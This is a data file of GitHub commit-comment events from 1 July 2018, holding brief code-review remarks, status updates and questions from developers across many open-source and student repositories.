{"id":"7903508289","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29559112,"position":null,"line":null,"path":null,"commit_id":"fc299fee1bdf07e92b732a6693b2c855d0e8a6c5","created_at":"2018-07-01T19:02:17Z","updated_at":"2018-07-01T19:02:17Z","author_association":"OWNER","body":"I tried `if (b)` with an earlier version, maybe something like you propose would help, thanks!"}},"created_at":"2018-07-01T19:02:17Z"}
{"id":"7903509080","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/FundsSplitter"},"payload":{"comment":{"id":29559113,"position":20,"line":20,"path":"contracts/FundsSplitter.sol","commit_id":"cba4bc351bc451ba8a3cf7cb0699ad91286eea39","created_at":"2018-07-01T19:02:50Z","updated_at":"2018-07-01T19:02:50Z","author_association":"OWNER","body":"Done. I struggled a bit then found out this syntax:  `deployer.deploy(MyContract, arg1, arg2, arg3);`"}},"created_at":"2018-07-01T19:02:50Z"}
{"id":"7903511636","type":"CommitCommentEvent","actor":{"login":"schrum2"},"repo":{"name":"schrum2/MM-NEAT"},"payload":{"comment":{"id":29559115,"position":31,"line":114,"path":"src/main/java/edu/southwestern/networks/hyperneat/architecture/CascadeNetworks.java","commit_id":"575c005acb6ccb3d87d1fddb41b9e4761f0813a2","created_at":"2018-07-01T19:04:30Z","updated_at":"2018-07-01T19:04:30Z","author_association":"OWNER","body":"returning the original unaltered population should be appropriate here. @DevonFulcher "}},"created_at":"2018-07-01T19:04:30Z"}
{"id":"7903514920","type":"CommitCommentEvent","actor":{"login":"kingmoduk"},"repo":{"name":"tesseract-ocr/tesseract"},"payload":{"comment":{"id":29559121,"position":null,"line":null,"path":null,"commit_id":"53795a88b5c2e226c09d26bd9c7eaf5e911716e4","created_at":"2018-07-01T19:06:49Z","updated_at":"2018-07-01T19:06:49Z","author_association":"NONE","body":"Kungmid\r\n"}},"created_at":"2018-07-01T19:06:49Z"}
{"id":"7903515415","type":"CommitCommentEvent","actor":{"login":"AlexGZhang2014"},"repo":{"name":"AlexGZhang2014/alexzhang-sinatra-app"},"payload":{"comment":{"id":29559122,"position":null,"line":null,"path":null,"commit_id":"cc2f65550923c458444e56a7d52fa821e647564d","created_at":"2018-07-01T19:07:12Z","updated_at":"2018-07-01T19:07:12Z","author_association":"OWNER","body":"Also added validation macro to item model and reworked code in collection controller that made use of the validation macro"}},"created_at":"2018-07-01T19:07:12Z"}
{"id":"7903515607","type":"CommitCommentEvent","actor":{"login":"ebroecker"},"repo":{"name":"ebroecker/canmatrix"},"payload":{"comment":{"id":29559123,"position":13,"line":189,"path":"canmatrix/canmatrix.py","commit_id":"a8893523319c4ede32e59ee19bf8420095945e41","created_at":"2018-07-01T19:07:21Z","updated_at":"2018-07-01T19:07:21Z","author_association":"OWNER","body":"you are right. this was a mistake, this should go to the delvelopement-branch..."}},"created_at":"2018-07-01T19:07:21Z"}
{"id":"7903515678","type":"CommitCommentEvent","actor":{"login":"hhyyrylainen"},"repo":{"name":"Revolutionary-Games/Thrive"},"payload":{"comment":{"id":29559124,"position":6,"line":16,"path":"scripts/microbe_stage/microbe_ai.as","commit_id":"bce0e7000b2d1ff8353b927d6202f110706b367b","created_at":"2018-07-01T19:07:23Z","updated_at":"2018-07-01T19:07:23Z","author_association":"CONTRIBUTOR","body":"The enum name should be ALL_UPPER_CASE"}},"created_at":"2018-07-01T19:07:23Z"}
{"id":"7903515963","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/FundsSplitter"},"payload":{"comment":{"id":29559125,"position":29,"line":29,"path":"contracts/FundsSplitter.sol","commit_id":"cba4bc351bc451ba8a3cf7cb0699ad91286eea39","created_at":"2018-07-01T19:07:35Z","updated_at":"2018-07-01T19:07:35Z","author_association":"OWNER","body":"Done. Good read.. Thanks"}},"created_at":"2018-07-01T19:07:35Z"}
{"id":"7903518551","type":"CommitCommentEvent","actor":{"login":"AndyK70"},"repo":{"name":"Courseplay/courseplay"},"payload":{"comment":{"id":29559127,"position":null,"line":null,"path":null,"commit_id":"69c7b88a3934ee3b9a46b0b414d1ce087b4e9506","created_at":"2018-07-01T19:09:25Z","updated_at":"2018-07-01T19:09:25Z","author_association":"NONE","body":"@pvajko  could you please add git tags to new versions, that way it is possible to follow along the changes. Especially for somebody like me holding branches of courseplay and wanting to merge the new stuff to my branches. Thanks :blush:"}},"created_at":"2018-07-01T19:09:25Z"}
{"id":"7903520413","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"rust-lang/rfcs"},"payload":{"comment":{"id":29559128,"position":null,"line":null,"path":null,"commit_id":"4cd75a6f822fe0a75fd502308d8f4674c31cebf3","created_at":"2018-07-01T19:10:46Z","updated_at":"2018-07-01T19:10:46Z","author_association":"NONE","body":"4cd75a6"}},"created_at":"2018-07-01T19:10:46Z"}
{"id":"7903520695","type":"CommitCommentEvent","actor":{"login":"Goodnew"},"repo":{"name":"Goodnew/Alc-quiz-app"},"payload":{"comment":{"id":29559129,"position":null,"line":null,"path":null,"commit_id":"34f4d2c26144257992b6290936e0d86dd4b12517","created_at":"2018-07-01T19:11:01Z","updated_at":"2018-07-01T19:11:01Z","author_association":"OWNER","body":"apk link:\r\nhttps://drive.google.com/file/d/1YHdilXxRAbSU4bi5Pzs0H5H-KQreKsXB/view?usp=sharing"}},"created_at":"2018-07-01T19:11:01Z"}
{"id":"7903525094","type":"CommitCommentEvent","actor":{"login":"carlos-briso"},"repo":{"name":"carlos-briso/prueba"},"payload":{"comment":{"id":29559135,"position":2,"line":2,"path":"README.md","commit_id":"84a62cd7d6582dca880d0d6dc594a4eef2311ca7","created_at":"2018-07-01T19:14:08Z","updated_at":"2018-07-01T19:14:08Z","author_association":"OWNER","body":"Ahora la 44444"}},"created_at":"2018-07-01T19:14:08Z"}
{"id":"7903526818","type":"CommitCommentEvent","actor":{"login":"Untrustedlife"},"repo":{"name":"Revolutionary-Games/Thrive"},"payload":{"comment":{"id":29559140,"position":6,"line":16,"path":"scripts/microbe_stage/microbe_ai.as","commit_id":"bce0e7000b2d1ff8353b927d6202f110706b367b","created_at":"2018-07-01T19:15:17Z","updated_at":"2018-07-01T19:15:17Z","author_association":"CONTRIBUTOR","body":"ill fix that"}},"created_at":"2018-07-01T19:15:17Z"}
{"id":"7903526982","type":"CommitCommentEvent","actor":{"login":"tarsius"},"repo":{"name":"magit/magit"},"payload":{"comment":{"id":29559141,"position":24,"line":6552,"path":"Documentation/magit.org","commit_id":"1e2f1686a16bbe05c12b59fb313d72486460c8ae","created_at":"2018-07-01T19:15:23Z","updated_at":"2018-07-01T19:15:23Z","author_association":"MEMBER","body":"No worries, and please continue making changes as you see fit (without trying to stay as close to the original phrasing if you think it would be better to not do that). I just shared my thoughts without trying to imply you should have done it differently. :wink: "}},"created_at":"2018-07-01T19:15:23Z"}
{"id":"7903531616","type":"CommitCommentEvent","actor":{"login":"heduenas"},"repo":{"name":"SpaceWhite/gomoss"},"payload":{"comment":{"id":29559142,"position":10,"line":10,"path":"moss_test.go","commit_id":"9e3586b9630a62d47294720253fddaa7f34f6be8","created_at":"2018-07-01T19:18:36Z","updated_at":"2018-07-01T19:18:36Z","author_association":"NONE","body":"should these case statements be indented more?"}},"created_at":"2018-07-01T19:18:36Z"}
{"id":"7903532754","type":"CommitCommentEvent","actor":{"login":"fourndo"},"repo":{"name":"simpeg/simpeg"},"payload":{"comment":{"id":29559144,"position":null,"line":null,"path":null,"commit_id":"03ea54de4637b1a17e414c5967a37a5f53047e14","created_at":"2018-07-01T19:19:29Z","updated_at":"2018-07-01T19:19:29Z","author_association":"MEMBER","body":"I would say watch out for this one. If ```dmisfit.W * prob.getJ()``` is sparse, then not doing power(2) might blow up your memory."}},"created_at":"2018-07-01T19:19:29Z"}
{"id":"7903532988","type":"CommitCommentEvent","actor":{"login":"vivienlouradour"},"repo":{"name":"vivienlouradour/weather-station"},"payload":{"comment":{"id":29559145,"position":null,"line":null,"path":null,"commit_id":"3e2a183c1b394bc821a9491ccfabfabe23a11731","created_at":"2018-07-01T19:19:39Z","updated_at":"2018-07-01T19:19:39Z","author_association":"OWNER","body":"#4 Partially done"}},"created_at":"2018-07-01T19:19:39Z"}
{"id":"7903534546","type":"CommitCommentEvent","actor":{"login":"joshua-rodgers"},"repo":{"name":"joshua-rodgers/OCA-Practice"},"payload":{"comment":{"id":29559149,"position":null,"line":null,"path":null,"commit_id":"da32e57116ad117dcdd80ed17997a1980ec560b9","created_at":"2018-07-01T19:20:45Z","updated_at":"2018-07-01T19:20:45Z","author_association":"OWNER","body":"Also changed in this iteration is the generation of random numbers. I removed the ‘generateRandom()’ function, placing the random number at the top of main. The reason for this is it seemed more efficient to create a single random object and utilize it throughout rather than creating another every time a Random is needed. "}},"created_at":"2018-07-01T19:20:45Z"}
{"id":"7903535274","type":"CommitCommentEvent","actor":{"login":"karinelago"},"repo":{"name":"MicrosoftDocs/powerbi-docs.pt-br"},"payload":{"comment":{"id":29559152,"position":null,"line":null,"path":null,"commit_id":"581dc5c2cbdc8bd8d122c561c8174a8d3054bdce","created_at":"2018-07-01T19:21:14Z","updated_at":"2018-07-01T19:21:14Z","author_association":"NONE","body":"É possível assinar um dashboard (painel) e no artigo diz que não é possível."}},"created_at":"2018-07-01T19:21:14Z"}
{"id":"7903537997","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"double-beep/Stockfish"},"payload":{"comment":{"id":29559157,"position":null,"line":null,"path":null,"commit_id":"b8eb768294931528e5e697b8af37164dc0a579a4","created_at":"2018-07-01T19:23:09Z","updated_at":"2018-07-01T19:23:09Z","author_association":"NONE","body":"I have deleted the test because you don't want to change any shell script before running tests on fishtest, only the C++ (and in a portable way)"}},"created_at":"2018-07-01T19:23:09Z"}
{"id":"7903548255","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"flkvch/NET.S.2018.Falkovich.01"},"payload":{"comment":{"id":29559171,"position":19,"line":18,"path":"SortingAlgorithms/Algorithms.cs","commit_id":"cb7919fd3f0afd07dbfa810b6c480ee8b23626cd","created_at":"2018-07-01T19:30:15Z","updated_at":"2018-07-01T19:30:15Z","author_association":"NONE","body":"а если array == null?"}},"created_at":"2018-07-01T19:30:15Z"}
{"id":"7903549971","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"flkvch/NET.S.2018.Falkovich.01"},"payload":{"comment":{"id":29559176,"position":65,"line":45,"path":"SortingAlgorithms/Algorithms.cs","commit_id":"cb7919fd3f0afd07dbfa810b6c480ee8b23626cd","created_at":"2018-07-01T19:31:17Z","updated_at":"2018-07-01T19:31:17Z","author_association":"NONE","body":"хотелось бы более информационное сообщение, как парамтр для конструктора ArgumentException()"}},"created_at":"2018-07-01T19:31:17Z"}
{"id":"7903551737","type":"CommitCommentEvent","actor":{"login":"shireen07"},"repo":{"name":"shireen07/Shireen_portfolio.github.io"},"payload":{"comment":{"id":29559177,"position":null,"line":null,"path":null,"commit_id":"b3c8506b8a7bbd725e012c3c074952ac1f67c395","created_at":"2018-07-01T19:32:30Z","updated_at":"2018-07-01T19:32:30Z","author_association":"OWNER","body":"commit delete CNAME"}},"created_at":"2018-07-01T19:32:30Z"}
{"id":"7903553442","type":"CommitCommentEvent","actor":{"login":"shireen07"},"repo":{"name":"shireen07/Shireen_portfolio.github.io"},"payload":{"comment":{"id":29559178,"position":null,"line":null,"path":null,"commit_id":"22e758c3012b55c87737e5e239fc59a8fa0a0c8f","created_at":"2018-07-01T19:33:44Z","updated_at":"2018-07-01T19:33:44Z","author_association":"OWNER","body":"commit create CNAME"}},"created_at":"2018-07-01T19:33:44Z"}
{"id":"7903556166","type":"CommitCommentEvent","actor":{"login":"asing012"},"repo":{"name":"asing012/CampuSale"},"payload":{"comment":{"id":29559182,"position":4,"line":6,"path":"README.md","commit_id":"33644593a3c99d36007ebc4e37a1a72d1eb1a5f2","created_at":"2018-07-01T19:35:40Z","updated_at":"2018-07-01T19:35:40Z","author_association":"OWNER","body":"Test Comment"}},"created_at":"2018-07-01T19:35:40Z"}
{"id":"7903557018","type":"CommitCommentEvent","actor":{"login":"javascriptkitty"},"repo":{"name":"javascriptkitty/js-exercices"},"payload":{"comment":{"id":29559184,"position":null,"line":null,"path":null,"commit_id":"b183328cc01f931df85faeec6f14551becd838d0","created_at":"2018-07-01T19:36:13Z","updated_at":"2018-07-01T19:36:13Z","author_association":"OWNER","body":"It returns only the first name, i dont know how to fix it((\r\n\r\nvar names = ['Dmitri', 'Olga', 'Bruno', 'Alfonzo'];\r\nvar list = {type: 'white',\r\n            names: ['Dmitri', 'Bruno'] };\r\n\r\nfunction accessCheck(names, list){\r\n  var listNames = list.names;\r\n  for (var i = 0; i < names.length; i++){\r\n    for (var j = 0; j < listNames.length; j++){\r\n        if (names[i] == listNames[j]){\r\n      return (names[i] + \" has an access\");\r\n      } else{\r\n    return (names[i] + \" doesn't have an access\");\r\n      }\r\n    }\r\n  }\r\n}\r\nvar result = accessCheck(names, list);\r\nconsole.log (result);"}},"created_at":"2018-07-01T19:36:13Z"}
{"id":"7903557133","type":"CommitCommentEvent","actor":{"login":"sjayminsgithub"},"repo":{"name":"sjayminsgithub/Mod-Installer-Template"},"payload":{"comment":{"id":29559185,"position":null,"line":null,"path":null,"commit_id":"8b8260f87e199302dbc6dc2b75d91fca55692da1","created_at":"2018-07-01T19:36:19Z","updated_at":"2018-07-01T19:36:19Z","author_association":"OWNER","body":"Hello all,\r\nI'm the developer.\r\nI have mistakenly forgotten to replace paths for external code files. I will fix that soon.\r\nThanks for you understanding. \r\nJaymin Suthar"}},"created_at":"2018-07-01T19:36:19Z"}
{"id":"7903558790","type":"CommitCommentEvent","actor":{"login":"IfcOpenBot"},"repo":{"name":"IfcOpenBot/IfcOpenShell"},"payload":{"comment":{"id":29559187,"position":null,"line":null,"path":null,"commit_id":"6fdd2049a2a62e754009e2c5089a04804f1e9078","created_at":"2018-07-01T19:37:27Z","updated_at":"2018-07-01T19:37:27Z","author_association":"OWNER","body":"Hi,\n\nI've created the following builds for your commit:\n\n[ifcopenshell-python-2.7.12-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-2.7.12-master-6fdd204-linux32.zip)\n[ifcopenshell-python-2.7.12u-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-2.7.12u-master-6fdd204-linux32.zip)\n[ifcopenshell-python-3.2.6-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-3.2.6-master-6fdd204-linux32.zip)\n[ifcopenshell-python-3.2.6u-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-3.2.6u-master-6fdd204-linux32.zip)\n[ifcopenshell-python-3.3.6-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-3.3.6-master-6fdd204-linux32.zip)\n[ifcopenshell-python-3.4.6-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-3.4.6-master-6fdd204-linux32.zip)\n[ifcopenshell-python-3.5.3-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-3.5.3-master-6fdd204-linux32.zip)\n[ifcopenshell-python-3.6.2-master-6fdd204-linux32.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-3.6.2-master-6fdd204-linux32.zip)\n[ifcopenshell-python-2.7.12-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-2.7.12-master-6fdd204-linux64.zip)\n[ifcopenshell-python-2.7.12u-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-2.7.12u-master-6fdd204-linux64.zip)\n[ifcopenshell-python-3.2.6-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-3.2.6-master-6fdd204-linux64.zip)\n[ifcopenshell-python-3.2.6u-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-3.2.6u-master-6fdd204-linux64.zip)\n[ifcopenshell-python-3.3.6-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-3.3.6-master-6fdd204-linux64.zip)\n[ifcopenshell-python-3.4.6-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-3.4.6-master-6fdd204-linux64.zip)\n[ifcopenshell-python-3.5.3-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-3.5.3-master-6fdd204-linux64.zip)\n[ifcopenshell-python-3.6.2-master-6fdd204-linux64.zip](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-3.6.2-master-6fdd204-linux64.zip)\n\nKind regards,\nIfcOpenBot\n"}},"created_at":"2018-07-01T19:37:27Z"}
{"id":"7903559470","type":"CommitCommentEvent","actor":{"login":"DarkMatterMatt"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29559188,"position":null,"line":null,"path":null,"commit_id":"ec67aeec3970024805a06e07c2b24e92121332b5","created_at":"2018-07-01T19:37:56Z","updated_at":"2018-07-01T19:37:56Z","author_association":"CONTRIBUTOR","body":"@Sugisakii it's not hard to auto update, I just `git pull` every few hours to update then restart if there was changes."}},"created_at":"2018-07-01T19:37:56Z"}
{"id":"7903559822","type":"CommitCommentEvent","actor":{"login":"mpickering"},"repo":{"name":"alanasp/ghc-gsoc"},"payload":{"comment":{"id":29559189,"position":14,"line":230,"path":"compiler/hsSyn/HsImpExp.hs","commit_id":"28c204b12817072d75b555c17698c34201a1997e","created_at":"2018-07-01T19:38:13Z","updated_at":"2018-07-01T19:38:13Z","author_association":"CONTRIBUTOR","body":"Can you reduce this duplication somehow? Adding a `Maybe WarningTxt` field to the existing constructors would work?"}},"created_at":"2018-07-01T19:38:13Z"}
{"id":"7903559984","type":"CommitCommentEvent","actor":{"login":"MrHunterZhao"},"repo":{"name":"MrHunterZhao/HotSpotSourceCodeExploration"},"payload":{"comment":{"id":29559190,"position":null,"line":null,"path":null,"commit_id":"a4397d64250ba5b7f21210a96c7f0e0a1ae88650","created_at":"2018-07-01T19:38:19Z","updated_at":"2018-07-01T19:38:19Z","author_association":"OWNER","body":"文章地址：https://hunterzhao.io/post/2018/06/11/hotspot-explore-inside-java-thread-run/"}},"created_at":"2018-07-01T19:38:19Z"}
{"id":"7903560013","type":"CommitCommentEvent","actor":{"login":"macta"},"repo":{"name":"pharo-vcs/tonel"},"payload":{"comment":{"id":29559191,"position":null,"line":null,"path":null,"commit_id":"bcdd1cc4a79acda1080a1b1914a77ef48b4adc42","created_at":"2018-07-01T19:38:20Z","updated_at":"2018-07-01T19:38:20Z","author_association":"CONTRIBUTOR","body":"That class has no comments, i'm not sure anyone casual would both know to find it or how to use? Should the readme.md at least reference this class, with an example of how to use it? Equally that class should have a class comment (I thought we were trying to provide class comments these days).\r\n\r\nI think the removal of the script (while a good idea) - needs to be done better. Previously the readme at least pointed people in the right direction. Can the author of of the new class please improve this?"}},"created_at":"2018-07-01T19:38:20Z"}
{"id":"7903561518","type":"CommitCommentEvent","actor":{"login":"mpickering"},"repo":{"name":"alanasp/ghc-gsoc"},"payload":{"comment":{"id":29559195,"position":15,"line":1707,"path":"compiler/parser/RdrHsSyn.hs","commit_id":"28c204b12817072d75b555c17698c34201a1997e","created_at":"2018-07-01T19:39:25Z","updated_at":"2018-07-01T19:39:25Z","author_association":"CONTRIBUTOR","body":"This looks duplicated from above as well?"}},"created_at":"2018-07-01T19:39:25Z"}
{"id":"7903561865","type":"CommitCommentEvent","actor":{"login":"TestingCrypto"},"repo":{"name":"TestingCrypto/vigilant-computing-machine"},"payload":{"comment":{"id":29559197,"position":null,"line":null,"path":null,"commit_id":"33a161e7ef4b49f37f7d14a23c310a7acd26d974","created_at":"2018-07-01T19:39:39Z","updated_at":"2018-07-01T19:39:39Z","author_association":"OWNER","body":"--never forget to update && upgrade, might miss an important bit of improv"}},"created_at":"2018-07-01T19:39:39Z"}
{"id":"7903563770","type":"CommitCommentEvent","actor":{"login":"miguelsousa"},"repo":{"name":"fonttools/fonttools"},"payload":{"comment":{"id":29559199,"position":null,"line":null,"path":null,"commit_id":"1d545b8f912a11ee09e83e45e29d004bc9166aa4","created_at":"2018-07-01T19:41:00Z","updated_at":"2018-07-01T19:41:00Z","author_association":"COLLABORATOR","body":"**makeotfexe** seems to be the culprit of the huge glyphs' advance widths\r\nhttps://github.com/adobe-type-tools/afdko/issues/456"}},"created_at":"2018-07-01T19:41:00Z"}
{"id":"7903566893","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"flkvch/NET.S.2018.Falkovich.03"},"payload":{"comment":{"id":29559200,"position":59,"line":59,"path":"MathOperations/Operations.cs","commit_id":"4e8a111c50e04e88b35d295477fa488d4bef33a9","created_at":"2018-07-01T19:43:00Z","updated_at":"2018-07-01T19:43:00Z","author_association":"NONE","body":"Этот метод должен трансформироваться в метод, который возвращает void (не bool), а проверяя параметры, он должен выбрасывать соответствующие исключения, в случае их не корректных значений. "}},"created_at":"2018-07-01T19:43:00Z"}
{"id":"7903567218","type":"CommitCommentEvent","actor":{"login":"mpickering"},"repo":{"name":"alanasp/ghc-gsoc"},"payload":{"comment":{"id":29559202,"position":26,"line":176,"path":"compiler/typecheck/TcRnExports.hs","commit_id":"e51109779e3f8621e65bded578a6d66ccf718241","created_at":"2018-07-01T19:43:14Z","updated_at":"2018-07-01T19:43:14Z","author_association":"CONTRIBUTOR","body":"I don't see how this works? "}},"created_at":"2018-07-01T19:43:14Z"}
{"id":"7903567664","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"flkvch/NET.S.2018.Falkovich.03"},"payload":{"comment":{"id":29559203,"position":76,"line":76,"path":"MathOperations/Operations.cs","commit_id":"4e8a111c50e04e88b35d295477fa488d4bef33a9","created_at":"2018-07-01T19:43:36Z","updated_at":"2018-07-01T19:43:36Z","author_association":"NONE","body":"Здесь логика мне не понятна...зачем все это?"}},"created_at":"2018-07-01T19:43:36Z"}
{"id":"7903567802","type":"CommitCommentEvent","actor":{"login":"mpickering"},"repo":{"name":"alanasp/ghc-gsoc"},"payload":{"comment":{"id":29559204,"position":42,"line":287,"path":"compiler/typecheck/TcRnExports.hs","commit_id":"e51109779e3f8621e65bded578a6d66ccf718241","created_at":"2018-07-01T19:43:42Z","updated_at":"2018-07-01T19:43:42Z","author_association":"CONTRIBUTOR","body":"Is this all duplicated or is there something new?"}},"created_at":"2018-07-01T19:43:42Z"}
{"id":"7903568027","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"yegor256/jpeek"},"payload":{"comment":{"id":29559205,"position":null,"line":null,"path":null,"commit_id":"b0e44df41065b910294b22e80284344bdedac198","created_at":"2018-07-01T19:43:53Z","updated_at":"2018-07-01T19:43:53Z","author_association":"COLLABORATOR","body":"Puzzle `66-9d79a0db` disappeared from [`src/main/java/org/jpeek/App.java`](https://github.com/yegor256/jpeek/blob/master/src/main/java/org/jpeek/App.java), that's why I closed #146. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-01T19:43:53Z"}
{"id":"7903568303","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"flkvch/NET.S.2018.Falkovich.03"},"payload":{"comment":{"id":29559206,"position":14,"line":14,"path":"MathOperations/Operations.cs","commit_id":"4e8a111c50e04e88b35d295477fa488d4bef33a9","created_at":"2018-07-01T19:44:07Z","updated_at":"2018-07-01T19:44:07Z","author_association":"NONE","body":"зачем здесь  эта константа?"}},"created_at":"2018-07-01T19:44:07Z"}
{"id":"7903569483","type":"CommitCommentEvent","actor":{"login":"rolyboy27"},"repo":{"name":"rolyboy27/My-Quiz-App"},"payload":{"comment":{"id":29559208,"position":2,"line":2,"path":"README.md","commit_id":"8dc925613c644fd09074ef57e3d5fcc81813b196","created_at":"2018-07-01T19:45:01Z","updated_at":"2018-07-01T19:45:01Z","author_association":"OWNER","body":"App name: Quiz App\r\nSubject: Android Basics\r\n\r\nOverview: This Project is about a simple Quiz App. of which, its Questions is gotten from the Androic Basic Curriculum.\r\n\r\nit is made up of two (2) Layout, one (1) for the home Screen where you have to type in your full Name before the App begins,\r\nand the Second Layout is where you attempt the Questions.\r\n\r\nAt the end, you get a toast and Alert indicating your Result after clicking the Submit Button.\r\n\r\nTHANKS FOR USING THIS APP!!!\r\n\r\n\r\nApp link:\r\nhttps://drive.google.com/open?id=1e4lusP0g52WZBMvJ3B628gLYrQV2kNJU"}},"created_at":"2018-07-01T19:45:01Z"}
{"id":"7903572489","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"flkvch/NET.S.2018.Falkovich.03"},"payload":{"comment":{"id":29559216,"position":43,"line":43,"path":"MathOperations/Operations.cs","commit_id":"4e8a111c50e04e88b35d295477fa488d4bef33a9","created_at":"2018-07-01T19:47:18Z","updated_at":"2018-07-01T19:47:18Z","author_association":"NONE","body":"- очень плохо читаемый блок, проситься while с условием продолжения цикла Math.Abs(xkp1 - xk) > accuracy\r\n- названия переменных корявые, должно быть current, next, previous или что-нибудь подобное\r\n- в принцире при реализации этого алгоритма можно было обойтись одним методом FindNthRoot\r\n"}},"created_at":"2018-07-01T19:47:18Z"}
{"id":"7903572794","type":"CommitCommentEvent","actor":{"login":"davidcharlat"},"repo":{"name":"Kallikrein/j04"},"payload":{"comment":{"id":29559218,"position":13,"line":11,"path":"ex01/ft_recursive_factorial.c","commit_id":"b6ee4341bf8086f46a41d2b38eddb0a2af9cc8a1","created_at":"2018-07-01T19:47:33Z","updated_at":"2018-07-01T19:47:33Z","author_association":"NONE","body":"because i thought the function must return 0 in case of exceeding the size of the int"}},"created_at":"2018-07-01T19:47:33Z"}
{"id":"7903575282","type":"CommitCommentEvent","actor":{"login":"MartinsOnuoha"},"repo":{"name":"Mr-emeka/VideoJot"},"payload":{"comment":{"id":29559222,"position":null,"line":null,"path":null,"commit_id":"fdcb3b76888755ccdfa66a7f5326502a3cfe1419","created_at":"2018-07-01T19:49:24Z","updated_at":"2018-07-01T19:49:24Z","author_association":"COLLABORATOR","body":"No problem, always read the error messages properly."}},"created_at":"2018-07-01T19:49:24Z"}
{"id":"7903576360","type":"CommitCommentEvent","actor":{"login":"Nifim"},"repo":{"name":"Windower/packages"},"payload":{"comment":{"id":29559228,"position":42,"line":42,"path":"linkshell_service/linkshell_service.lua","commit_id":"dd7bc6ec086e19ab9844cb47f5bc192096ad37a8","created_at":"2018-07-01T19:50:13Z","updated_at":"2018-07-01T19:50:13Z","author_association":"CONTRIBUTOR","body":"you need to actually run these through your handler\r\nhandler_color(packets.incoming[0x00D].last)"}},"created_at":"2018-07-01T19:50:13Z"}
{"id":"7903576887","type":"CommitCommentEvent","actor":{"login":"Dadkill"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29559229,"position":null,"line":null,"path":null,"commit_id":"d86471e45333be107283d47e931f96ea88e483df","created_at":"2018-07-01T19:50:37Z","updated_at":"2018-07-01T19:50:37Z","author_association":"NONE","body":"What is the difference? I'm curious"}},"created_at":"2018-07-01T19:50:37Z"}
{"id":"7903576895","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"flkvch/NET.S.2018.Falkovich.03"},"payload":{"comment":{"id":29559230,"position":10,"line":10,"path":"MathOperations.Tests/OperationsTests.cs","commit_id":"4e8a111c50e04e88b35d295477fa488d4bef33a9","created_at":"2018-07-01T19:50:37Z","updated_at":"2018-07-01T19:50:37Z","author_association":"NONE","body":"Все валидные тесткейсы как атрибута одного тестового метода, зачем из столько одинаковых?\r\nАналогично все не валидные для другого тестового метода"}},"created_at":"2018-07-01T19:50:37Z"}
{"id":"7903577483","type":"CommitCommentEvent","actor":{"login":"hackiftekhar"},"repo":{"name":"hackiftekhar/IQKeyboardManager"},"payload":{"comment":{"id":29559233,"position":null,"line":null,"path":null,"commit_id":"9bb0f564c95fd6f015775c289f4d228658c006de","created_at":"2018-07-01T19:51:03Z","updated_at":"2018-07-01T19:51:03Z","author_association":"OWNER","body":"Hmm, okay. I'll check then by modifying my demo project."}},"created_at":"2018-07-01T19:51:03Z"}
{"id":"7903577666","type":"CommitCommentEvent","actor":{"login":"Nifim"},"repo":{"name":"Windower/packages"},"payload":{"comment":{"id":29559234,"position":19,"line":19,"path":"linkshell/linkshell.lua","commit_id":"dd7bc6ec086e19ab9844cb47f5bc192096ad37a8","created_at":"2018-07-01T19:51:11Z","updated_at":"2018-07-01T19:51:11Z","author_association":"CONTRIBUTOR","body":"You can remove this section and just return result[l]"}},"created_at":"2018-07-01T19:51:11Z"}
{"id":"7903579358","type":"CommitCommentEvent","actor":{"login":"johndpope"},"repo":{"name":"elmines/EmotChatbot"},"payload":{"comment":{"id":29559237,"position":58,"line":58,"path":"loader.py","commit_id":"0693826c110407bedfc7c0f97090e8bd15741c82","created_at":"2018-07-01T19:52:27Z","updated_at":"2018-07-01T19:52:27Z","author_association":"NONE","body":"is it possible to cherry pick and upgrade the embeddings to use elmo for token embedder.\r\nthis was done successfully here - \r\n https://github.com/deepmipt/DeepPavlov/pull/292"}},"created_at":"2018-07-01T19:52:27Z"}
